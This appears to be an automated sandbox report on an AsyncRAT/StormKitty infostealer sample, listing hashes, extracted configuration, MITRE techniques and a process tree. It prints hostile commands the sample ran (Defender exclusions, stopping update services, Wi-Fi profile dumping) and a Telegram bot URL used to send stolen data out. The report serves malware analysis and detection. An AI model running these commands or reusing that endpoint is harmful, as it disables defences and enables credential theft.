asyncrat | d343b96c042127d09e8c352217518ac8cebe37a149d7dcc2f357bc42f745b1bd

Analysis

max time kernel
39s
max time network
61s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10-09-2024 18:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PasteHook.exe
Size

19KB
MD5

2d6eec7c4e6fa137078f28fb192c4578
SHA1

7fc20709c0b346263b2376d70b4b494d5077d195
SHA256

d343b96c042127d09e8c352217518ac8cebe37a149d7dcc2f357bc42f745b1bd
SHA512

dc38dad9706da23faabdad35cd1b460341aaa3cc35fa2c2106c63fe89981ac4b00a485548b1c2e9ef3b391d00ea165d26abfe1c45fc952b3c6d3da080da33c53
SSDEEP

384:1XA3ZfKPgE9o3t+ivPMPlKd1LtctCrgFdJWj7Ia3XmNHg:OfKBhKd1aCrgfJO132NA

Score

10^/10

asyncrat stormkitty default credential_access defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7176059714:AAHLQAohqhJW7FGmgGL4d1LQXdAckM2UGto/sendMessage?chat_id=1498157292

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023477-36.dat	family_stormkitty
behavioral1/memory/632-51-0x0000000000BB0000-0x0000000000BE2000-memory.dmp	family_stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 436 created 3428	436	updater.exe	56
PID 436 created 3428	436	updater.exe	56
PID 436 created 3428	436	updater.exe	56
PID 436 created 3428	436	updater.exe	56
PID 436 created 3428	436	updater.exe	56
PID 436 created 3428	436	updater.exe	56

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0008000000023477-36.dat	family_asyncrat

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3400	powershell.exe
1320	powershell.exe
3124	powershell.exe
1640	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	PasteHook.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	er8ySk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	PasteHook.exe

Deletes itself 1 IoCs

pid	Process
4812	PasteHook.exe

Executes dropped EXE 5 IoCs

pid	Process
448	er8ySk.exe
632	423.exe
4812	PasteHook.exe
4384	pastehook.exe
436	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	423.exe
File opened for modification	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	423.exe
File created	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	423.exe
File created	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	423.exe
File opened for modification	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	423.exe
File created	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	423.exe
File created	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	423.exe
File created	C:\Users\Admin\AppData\Local\f264d17220d4bb49ec07eb0a702c8273\Admin@ERHQJVYQ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	423.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
52	icanhazip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1876	powercfg.exe
4584	powercfg.exe
4520	cmd.exe
2316	powercfg.exe
5052	powercfg.exe
1216	powercfg.exe
3576	powercfg.exe
4348	cmd.exe
3500	powercfg.exe
1232	powercfg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\MicrosoftEdge	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4812	PasteHook.exe
4812	PasteHook.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 436 set thread context of 3148	436	updater.exe	121

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft\Edge\updater.exe	updater.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2532	sc.exe
4408	sc.exe
3556	sc.exe
64	sc.exe
1572	sc.exe
1372	sc.exe
3900	sc.exe
2364	sc.exe
4932	sc.exe
2708	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	423.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	er8ySk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PasteHook.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4820	cmd.exe
4332	netsh.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	er8ySk.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
4812	PasteHook.exe
4812	PasteHook.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
632	423.exe
436	updater.exe
436	updater.exe
1320	powershell.exe
1320	powershell.exe
1320	powershell.exe
436	updater.exe
436	updater.exe
436	updater.exe
436	updater.exe
436	updater.exe
436	updater.exe
436	updater.exe
436	updater.exe
3148	dialer.exe
3148	dialer.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
3148	dialer.exe
3148	dialer.exe
3148	dialer.exe
3148	dialer.exe
3148	dialer.exe
3148	dialer.exe
3148	dialer.exe
3148	dialer.exe
3124	powershell.exe
3148	dialer.exe
3148	dialer.exe
436	updater.exe
436	updater.exe
3148	dialer.exe
3148	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	632	423.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	3148	dialer.exe
Token: SeShutdownPrivilege	3500	powercfg.exe
Token: SeCreatePagefilePrivilege	3500	powercfg.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeShutdownPrivilege	1232	powercfg.exe
Token: SeCreatePagefilePrivilege	1232	powercfg.exe
Token: SeShutdownPrivilege	4584	powercfg.exe
Token: SeCreatePagefilePrivilege	4584	powercfg.exe
Token: SeShutdownPrivilege	5052	powercfg.exe
Token: SeCreatePagefilePrivilege	5052	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1840	svchost.exe
Token: SeIncreaseQuotaPrivilege	1840	svchost.exe
Token: SeSecurityPrivilege	1840	svchost.exe
Token: SeTakeOwnershipPrivilege	1840	svchost.exe
Token: SeLoadDriverPrivilege	1840	svchost.exe
Token: SeSystemtimePrivilege	1840	svchost.exe
Token: SeBackupPrivilege	1840	svchost.exe
Token: SeRestorePrivilege	1840	svchost.exe
Token: SeShutdownPrivilege	1840	svchost.exe
Token: SeSystemEnvironmentPrivilege	1840	svchost.exe
Token: SeUndockPrivilege	1840	svchost.exe
Token: SeManageVolumePrivilege	1840	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1840	svchost.exe
Token: SeIncreaseQuotaPrivilege	1840	svchost.exe
Token: SeSecurityPrivilege	1840	svchost.exe
Token: SeTakeOwnershipPrivilege	1840	svchost.exe
Token: SeLoadDriverPrivilege	1840	svchost.exe
Token: SeSystemtimePrivilege	1840	svchost.exe
Token: SeBackupPrivilege	1840	svchost.exe
Token: SeRestorePrivilege	1840	svchost.exe
Token: SeShutdownPrivilege	1840	svchost.exe
Token: SeSystemEnvironmentPrivilege	1840	svchost.exe
Token: SeUndockPrivilege	1840	svchost.exe
Token: SeManageVolumePrivilege	1840	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1840	svchost.exe
Token: SeIncreaseQuotaPrivilege	1840	svchost.exe
Token: SeSecurityPrivilege	1840	svchost.exe
Token: SeTakeOwnershipPrivilege	1840	svchost.exe
Token: SeLoadDriverPrivilege	1840	svchost.exe
Token: SeSystemtimePrivilege	1840	svchost.exe
Token: SeBackupPrivilege	1840	svchost.exe
Token: SeRestorePrivilege	1840	svchost.exe
Token: SeShutdownPrivilege	1840	svchost.exe
Token: SeSystemEnvironmentPrivilege	1840	svchost.exe
Token: SeUndockPrivilege	1840	svchost.exe
Token: SeManageVolumePrivilege	1840	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1840	svchost.exe
Token: SeIncreaseQuotaPrivilege	1840	svchost.exe
Token: SeSecurityPrivilege	1840	svchost.exe
Token: SeTakeOwnershipPrivilege	1840	svchost.exe
Token: SeLoadDriverPrivilege	1840	svchost.exe
Token: SeSystemtimePrivilege	1840	svchost.exe
Token: SeBackupPrivilege	1840	svchost.exe
Token: SeRestorePrivilege	1840	svchost.exe
Token: SeShutdownPrivilege	1840	svchost.exe
Token: SeSystemEnvironmentPrivilege	1840	svchost.exe
Token: SeUndockPrivilege	1840	svchost.exe
Token: SeManageVolumePrivilege	1840	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1840	svchost.exe
Token: SeIncreaseQuotaPrivilege	1840	svchost.exe
Token: SeSecurityPrivilege	1840	svchost.exe
Token: SeTakeOwnershipPrivilege	1840	svchost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4812	PasteHook.exe
4812	PasteHook.exe
4384	pastehook.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 916 wrote to memory of 448	916	PasteHook.exe	94
PID 916 wrote to memory of 448	916	PasteHook.exe	94
PID 916 wrote to memory of 448	916	PasteHook.exe	94
PID 448 wrote to memory of 1988	448	er8ySk.exe	96
PID 448 wrote to memory of 1988	448	er8ySk.exe	96
PID 448 wrote to memory of 1988	448	er8ySk.exe	96
PID 448 wrote to memory of 632	448	er8ySk.exe	97
PID 448 wrote to memory of 632	448	er8ySk.exe	97
PID 448 wrote to memory of 632	448	er8ySk.exe	97
PID 448 wrote to memory of 4812	448	er8ySk.exe	99
PID 448 wrote to memory of 4812	448	er8ySk.exe	99
PID 448 wrote to memory of 4812	448	er8ySk.exe	99
PID 4812 wrote to memory of 4384	4812	PasteHook.exe	100
PID 4812 wrote to memory of 4384	4812	PasteHook.exe	100
PID 4812 wrote to memory of 436	4812	PasteHook.exe	102
PID 4812 wrote to memory of 436	4812	PasteHook.exe	102
PID 632 wrote to memory of 4820	632	423.exe	107
PID 632 wrote to memory of 4820	632	423.exe	107
PID 632 wrote to memory of 4820	632	423.exe	107
PID 4820 wrote to memory of 740	4820	cmd.exe	109
PID 4820 wrote to memory of 740	4820	cmd.exe	109
PID 4820 wrote to memory of 740	4820	cmd.exe	109
PID 4820 wrote to memory of 4332	4820	cmd.exe	110
PID 4820 wrote to memory of 4332	4820	cmd.exe	110
PID 4820 wrote to memory of 4332	4820	cmd.exe	110
PID 4820 wrote to memory of 1288	4820	cmd.exe	111
PID 4820 wrote to memory of 1288	4820	cmd.exe	111
PID 4820 wrote to memory of 1288	4820	cmd.exe	111
PID 4432 wrote to memory of 4408	4432	cmd.exe	114
PID 4432 wrote to memory of 4408	4432	cmd.exe	114
PID 4432 wrote to memory of 2364	4432	cmd.exe	115
PID 4432 wrote to memory of 2364	4432	cmd.exe	115
PID 4432 wrote to memory of 4932	4432	cmd.exe	116
PID 4432 wrote to memory of 4932	4432	cmd.exe	116
PID 4432 wrote to memory of 2708	4432	cmd.exe	117
PID 4432 wrote to memory of 2708	4432	cmd.exe	117
PID 4432 wrote to memory of 3556	4432	cmd.exe	118
PID 4432 wrote to memory of 3556	4432	cmd.exe	118
PID 436 wrote to memory of 3148	436	updater.exe	121
PID 632 wrote to memory of 1772	632	423.exe	124
PID 632 wrote to memory of 1772	632	423.exe	124
PID 632 wrote to memory of 1772	632	423.exe	124
PID 4348 wrote to memory of 3500	4348	cmd.exe	126
PID 4348 wrote to memory of 3500	4348	cmd.exe	126
PID 1772 wrote to memory of 812	1772	cmd.exe	127
PID 1772 wrote to memory of 812	1772	cmd.exe	127
PID 1772 wrote to memory of 812	1772	cmd.exe	127
PID 4348 wrote to memory of 1232	4348	cmd.exe	128
PID 4348 wrote to memory of 1232	4348	cmd.exe	128
PID 1772 wrote to memory of 4644	1772	cmd.exe	129
PID 1772 wrote to memory of 4644	1772	cmd.exe	129
PID 1772 wrote to memory of 4644	1772	cmd.exe	129
PID 4348 wrote to memory of 4584	4348	cmd.exe	130
PID 4348 wrote to memory of 4584	4348	cmd.exe	130
PID 4348 wrote to memory of 5052	4348	cmd.exe	131
PID 4348 wrote to memory of 5052	4348	cmd.exe	131
PID 3148 wrote to memory of 612	3148	dialer.exe	5
PID 3148 wrote to memory of 672	3148	dialer.exe	7
PID 3148 wrote to memory of 964	3148	dialer.exe	12
PID 3148 wrote to memory of 384	3148	dialer.exe	13
PID 3148 wrote to memory of 428	3148	dialer.exe	14
PID 3148 wrote to memory of 1044	3148	dialer.exe	15
PID 3148 wrote to memory of 1128	3148	dialer.exe	17
PID 3148 wrote to memory of 1164	3148	dialer.exe	18

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1164
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2788
- C:\Program Files\Microsoft\Edge\updater.exe
  "C:\Program Files\Microsoft\Edge\updater.exe"
  2⤵
  PID:3620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1460
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1356

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2780

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2824

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2856

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3344

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3428
- C:\Users\Admin\AppData\Local\Temp\PasteHook.exe
  "C:\Users\Admin\AppData\Local\Temp\PasteHook.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:916
- - C:\Users\Admin\AppData\Roaming\er8ySk.exe
    "C:\Users\Admin\AppData\Roaming\er8ySk.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:448
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\portsessionSvc\XVggw8UvBKM1risQ.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1988
  - - C:\portsessionSvc\423.exe
      "C:\portsessionSvc\423.exe"
      4⤵
      Executes dropped EXE
      Drops desktop.ini file(s)
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4820
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:740
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4332
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1288
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1772
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:812
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4644
  - - C:\portsessionSvc\PasteHook.exe
      "C:\portsessionSvc\PasteHook.exe"
      4⤵
      Checks computer location settings
      Deletes itself
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4812
    - - C:\Users\Admin\AppData\Local\Temp\pastehook.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pastehook.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4384
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4340
    - - C:\Users\Admin\AppData\Local\Temp\updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\updater.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1320
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4432
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4408
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2364
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4932
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2708
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3556
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3500
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1232
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4584
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
